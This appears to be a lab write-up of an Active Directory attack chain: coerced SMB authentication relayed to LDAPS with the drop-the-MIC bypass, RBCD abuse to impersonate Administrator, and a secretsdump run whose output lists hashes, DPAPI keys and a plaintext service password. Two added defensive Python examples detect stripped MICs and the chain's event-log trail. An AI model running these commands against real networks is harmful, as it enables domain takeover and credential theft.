Coerced SMB auth + ntlmrelayx to LDAPS with drop the MIC

We can coerce a connection from the Baltimore DC to our host using several methods (PetitPotam, PrinterBug, DFSCoerce). To run every coercion method without choosing between them, we can use the all-in-one tool that was just released, coercer.

As explained beautifully in the hackndo blog (en.hackndo.com/ntlm-relay) and in The Hacker Recipes (www.thehacker.recipes/ad/movement/ntlm/relay), you can't relay an SMB connection to an LDAP(S) connection without using CVE-2019-1040, a.k.a. drop the MIC (--remove-mic).

  • Start the relay with --remove-mic targeting the LDAPS service of baltimore.maryland.local.

  • Run the coerced authentication against Salisbury (Salisbury is an up-to-date Windows Server 2016, so unauthenticated PetitPotam will not work here).
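To see what the patched side of CVE-2019-1040 actually checks, and what a network sensor can check too, here is an added example (not code from this post, hackndo or The Hacker Recipes) that parses an NTLM AUTHENTICATE_MESSAGE, reports whether signing was negotiated, and flags the case where the NTLMv2 response's MsvAvFlags claims a MIC but no MIC is present in the header. The AvPairs are covered by the NTLMv2 HMAC, which is why a server that verifies this relationship stops the relay. The two sample messages are constructed with the builder at the bottom; the NTProofStr in them is filler, not a real HMAC, and the account and domain names are taken from the lab above.

```python
import struct

# NegotiateFlags and AvPair values from MS-NLMP (sections 2.2.2.5 and 2.2.2.1)
NTLMSSP_NEGOTIATE_UNICODE     = 0x00000001
NTLMSSP_NEGOTIATE_SIGN        = 0x00000010
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
NTLMSSP_NEGOTIATE_VERSION     = 0x02000000
MSV_AV_EOL   = 0x0000
MSV_AV_FLAGS = 0x0006
MSV_AV_FLAGS_MIC_PROVIDED = 0x00000002   # "the client is providing a MIC"

FIELD_OFFSETS = (12, 20, 28, 36, 44, 52)  # LmResp, NtResp, Domain, User, Workstation, SessionKey


def _av_flags(buf, nt_off, nt_len):
    """Walk the AvPairs inside an NTLMv2 response and return MsvAvFlags (0 if absent)."""
    pos, end = nt_off + 44, nt_off + nt_len   # 16-byte NTProofStr + 28-byte client-challenge header
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", buf, pos)
        if av_id == MSV_AV_EOL:
            break
        if av_id == MSV_AV_FLAGS and av_len == 4:
            return struct.unpack_from("<I", buf, pos + 4)[0]
        pos += 4 + av_len
    return 0


def parse_authenticate(buf):
    """Extract the fields a relay detector cares about from an AUTHENTICATE_MESSAGE."""
    if buf[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", buf, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    fields = [struct.unpack_from("<HHI", buf, off) for off in FIELD_OFFSETS]   # (Len, MaxLen, Offset)
    _lm, nt, dom, usr, _ws, _key = fields
    flags = struct.unpack_from("<I", buf, 60)[0]
    # Version (8 bytes at 64) and MIC (16 bytes at 72) are only present when the
    # payload starts beyond them, so the lowest payload offset gives the header size.
    payload_start = min([f[2] for f in fields if f[0]] or [len(buf)])
    mic = buf[72:88] if payload_start >= 88 else b""
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "cp437"
    return {
        "user": buf[usr[2]:usr[2] + usr[0]].decode(enc),
        "domain": buf[dom[2]:dom[2] + dom[0]].decode(enc),
        "signing_negotiated": bool(flags & (NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN)),
        "mic_present": len(mic) == 16 and any(mic),
        # NTLMv1 responses are exactly 24 bytes and carry no AvPairs
        "av_claims_mic": nt[0] > 24 and bool(_av_flags(buf, nt[2], nt[0]) & MSV_AV_FLAGS_MIC_PROVIDED),
    }


def assess(buf):
    """Return finding codes for a message; an empty list means nothing relay-like was seen."""
    info = parse_authenticate(buf)
    findings = []
    if not info["signing_negotiated"]:
        findings.append("no-signing")
    if info["av_claims_mic"] and not info["mic_present"]:
        # The AvPairs sit under the NTLMv2 HMAC, so the MIC bit cannot be cleared
        # without the user's hash; a MIC claimed there but absent from the header
        # is exactly the inconsistency the CVE-2019-1040 fix rejects.
        findings.append("mic-stripped")
    return findings


def build_authenticate(user, domain, flags, av_flags, mic=None):
    """Constructed test message: the NTProofStr is filler, not a real HMAC (hypothetical helper)."""
    domain_u, user_u = domain.encode("utf-16-le"), user.encode("utf-16-le")
    av_pairs = (struct.pack("<HH", 0x0002, len(domain_u)) + domain_u          # MsvAvNbDomainName
                + struct.pack("<HHI", MSV_AV_FLAGS, 4, av_flags)
                + struct.pack("<HH", MSV_AV_EOL, 0))
    nt_resp = (b"\x11" * 16 + b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + b"\x22" * 8
               + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    header_len = 88 if mic else 72
    payload, descriptors = b"", b""
    for blob in (b"\x00" * 24, nt_resp, domain_u, user_u, b"", b""):
        descriptors += struct.pack("<HHI", len(blob), len(blob), header_len + len(payload))
        payload += blob
    msg = (b"NTLMSSP\x00" + struct.pack("<I", 3) + descriptors + struct.pack("<I", flags)
           + b"\x0a\x00\x61\x4a\x00\x00\x00\x0f")          # Version: 10.0 build 19041, NTLMSSP rev 15
    return msg + (mic or b"") + payload


BASE_FLAGS = NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_VERSION
# Constructed samples: an untouched client message and one with signing flags and MIC removed.
SAMPLE_INTACT = build_authenticate("SALISBURY$", "MARYLAND",
                                   BASE_FLAGS | NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN,
                                   MSV_AV_FLAGS_MIC_PROVIDED, mic=b"\xaa" * 16)
SAMPLE_STRIPPED = build_authenticate("SALISBURY$", "MARYLAND", BASE_FLAGS, MSV_AV_FLAGS_MIC_PROVIDED)

if __name__ == "__main__":
    for name, sample in (("intact", SAMPLE_INTACT), ("stripped", SAMPLE_STRIPPED)):
        print(name, parse_authenticate(sample)["user"], assess(sample))
```

Running the block prints an empty finding list for the intact message and `['no-signing', 'mic-stripped']` for the stripped one. The same two checks are what to look for in a packet capture of the relayed session, and the mitigation side is the usual one: patch CVE-2019-1040 on every DC and require LDAP signing and channel binding so an unsigned relayed session is refused regardless.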

Installation

sudo python3 -m pip install coercer

Collecting coercer
  Downloading coercer-2.4-py3-none-any.whl (49 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.1/49.1 kB 136.3 kB/s eta 0:00:00
Requirement already satisfied: xlsxwriter in /usr/lib/python3/dist-packages (from coercer) (3.0.2)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from coercer) (0.10.0)
Requirement already satisfied: jinja2 in /usr/lib/python3/dist-packages (from coercer) (3.0.3)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->coercer) (1.2.4)
Installing collected packages: coercer
Successfully installed coercer-2.4
 
Start the relay

sudo ntlmrelayx.py -t ldaps://baltimore.maryland.local -smb2support --remove-mic --add-computer removemiccomputer --delegate-access

Let's coerce

coercer coerce -u joaquin.Pereida -d maryland.local -p horse -t salisbury.maryland.local -l 192.168.56.31

ntlmrelayx output once Salisbury connects back

[*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.56.23, attacking target ldaps://baltimore.maryland.local
[*] Authenticating against ldaps://baltimore.maryland.local as MARYLAND/SALISBURY$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-7: Connection from 192.168.56.23 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=maryland,DC=local
[*] Adding new computer with username: removemiccomputer$ and password: *mHcnugW1<KF8Oq result: OK
[*] Delegation rights modified succesfully!
[*] removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy
  • The attack worked: we can now abuse RBCD on Salisbury by requesting a service ticket for its service principal name (-spn HOST/salisbury.maryland.local) while impersonating Administrator.

sudo getST.py -spn HOST/salisbury.maryland.local -impersonate Administrator -dc-ip 192.168.56.12 'MARYLAND.LOCAL/removemiccomputer$:*mHcnugW1<KF8Oq'
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
  • and use that ticket to dump the SAM database from the Salisbury server.

export KRB5CCNAME=/workspace/Administrator.ccache
secretsdump.py -k -no-pass 'MARYLAND.LOCAL/Administrator@salisbury.maryland.local'

Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3e6d1ece16a534e660a94480bd6f2a32
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:84fe45d7c3263065e931761aef6c7aaf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARYLAND.LOCAL/sql_svc:$DCC2$10240#sql_svc#89e701ebbd305e4f5380c5150494584a
MARYLAND.LOCAL/joaquin.Pereida:$DCC2$10240#joaquin.Pereida#39dfbbbb2ff73c019c37498e96708c37
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
maryland\SALISBURY$:plain_password_hex:2100480079004f0060003800600078002b006300270058003e0056004f003c003c004a005100520039005e007a0043005b004d0038005000390073004b00780057003e004800300026004c003b0040004300330055003b00450045006900260046006400700031004c002e00450028002300290045006e0074003d005f005500550051002300760073004a0031002b0078004c0055002100500043004f005b00380072006b005a002d0055002000230032005e004d005a006a006900470044002e0066003c003a0040004b00310079002f0075002e0078005a0063002a002f00690052006f0034003800700041003800
maryland\SALISBURY$:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0810ead1cae293ee405b7051a9d3a3a3b8afbc0b
dpapi_userkey:0x39f7f79d4d6d8889ba4f1c5bf55a42429702eded
[*] NL$KM 
 0000   26 72 00 BB 64 CB DD D7  34 20 B4 AC 7E 9A 99 05   &r..d...4 ..~...
 0010   75 95 40 EF C7 ED 72 3E  F4 66 93 E7 3D C9 B8 56   u.@...r>.f..=..V
 0020   EC E8 6E 4E 40 13 86 34  A8 F6 E6 36 C6 71 9F 7A   ..nN@..4...6.q.z
 0030   8F 63 A3 23 D9 37 A0 BC  07 C0 0B 06 41 21 5E 64   .c.#.7......A!^d
NL$KM:267200bb64cbddd73420b4ac7e9a9905759540efc7ed723ef46693e73dc9b856ece86e4e40138634a8f6e636c6719f7a8f63a323d937a0bc07c00b0641215e64
[*] _SC_MSSQL$SQLEXPRESS 
maryland.local\sql_svc:YouWillNotKerboroast1ngMeeeeee
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
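The whole chain above leaves a recognisable trail on the domain controller: a network NTLM logon (4624) for SALISBURY$ that comes from the relay host rather than from Salisbury, a computer account created by a machine account (4741), and a write to msDS-AllowedToActOnBehalfOfOtherIdentity (5136). The following added example (not part of this post and not GOAD or Impacket code) correlates those three events over constructed JSON-lines samples; the IP addresses and account names are the ones used in the lab above, and the expected-host table is an assumed asset inventory. Event 5136 only appears when "Audit Directory Service Changes" is enabled and the computer objects carry a SACL for attribute writes.

```python
import json
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed sample events (JSON, one per line) modelled on what the DC logs during
# the chain: 4624 = logon, 4741 = computer account created, 5136 = object modified.
# Field names follow the Windows event XML; the last two lines are benign noise.
SAMPLE_EVENTS = """\
{"EventID": 4624, "TimeCreated": "2023-02-16T10:00:01", "TargetUserName": "SALISBURY$", "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.56.31"}
{"EventID": 4741, "TimeCreated": "2023-02-16T10:00:02", "SubjectUserName": "SALISBURY$", "TargetUserName": "removemiccomputer$"}
{"EventID": 5136, "TimeCreated": "2023-02-16T10:00:03", "SubjectUserName": "SALISBURY$", "ObjectDN": "CN=SALISBURY,CN=Computers,DC=maryland,DC=local", "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"}
{"EventID": 4624, "TimeCreated": "2023-02-16T10:05:00", "TargetUserName": "SALISBURY$", "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "192.168.56.23"}
{"EventID": 4624, "TimeCreated": "2023-02-16T10:06:00", "TargetUserName": "joaquin.Pereida", "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.56.40"}
"""

# Assumed asset inventory: the host each machine account is expected to authenticate from.
EXPECTED_HOSTS = {"SALISBURY$": "192.168.56.23"}


def load_events(text):
    """Parse JSON-lines events and attach a datetime for ordering and windowing."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["_ts"] = datetime.fromisoformat(ev["TimeCreated"])
            events.append(ev)
    return events


def detect(events, expected_hosts, window=timedelta(minutes=10)):
    """Return (rule, account, detail) findings; rules are evaluated in time order."""
    findings, suspect_logon, chained = [], {}, set()

    def chain(acct, ts, detail):
        # A directory write by an account that just authenticated with NTLM from the
        # wrong host is the relay -> RBCD sequence; report it once per account.
        if acct in suspect_logon and ts - suspect_logon[acct] <= window and acct not in chained:
            chained.add(acct)
            findings.append(("relay-to-rbcd-chain", acct, detail))

    for ev in sorted(events, key=lambda e: e["_ts"]):
        eid = ev["EventID"]
        if eid == 4624 and ev.get("LogonType") == "3" and ev.get("AuthenticationPackageName") == "NTLM":
            acct = ev["TargetUserName"]
            # Machine accounts normally only authenticate from their own host.
            if acct.endswith("$") and ev.get("IpAddress") != expected_hosts.get(acct):
                findings.append(("ntlm-machine-logon-unexpected-ip", acct, ev.get("IpAddress")))
                suspect_logon[acct] = ev["_ts"]
        elif eid == 4741:
            subj = ev["SubjectUserName"]
            # Computer accounts do not create other computer accounts in normal operation.
            if subj.endswith("$"):
                findings.append(("computer-account-created-by-machine-account", subj, ev["TargetUserName"]))
                chain(subj, ev["_ts"], "4741 " + ev["TargetUserName"])
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            subj = ev["SubjectUserName"]
            findings.append(("rbcd-attribute-written", subj, ev["ObjectDN"]))
            chain(subj, ev["_ts"], "5136 " + ev["ObjectDN"])
    return findings


if __name__ == "__main__":
    for rule, acct, detail in detect(load_events(SAMPLE_EVENTS), EXPECTED_HOSTS):
        print(f"{rule:45} {acct:20} {detail}")
```

On the sample data the detector raises four findings: the NTLM logon of SALISBURY$ from the relay host, the 4741 by a machine account, the correlated relay-to-RBCD chain, and the RBCD attribute write; the Kerberos logon from Salisbury's own address and the user logon are not flagged. If the inventory wrongly lists the relay host as Salisbury's address, only the two directory-write rules fire, which is why the expected-host table has to be accurate for the chain rule to work.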
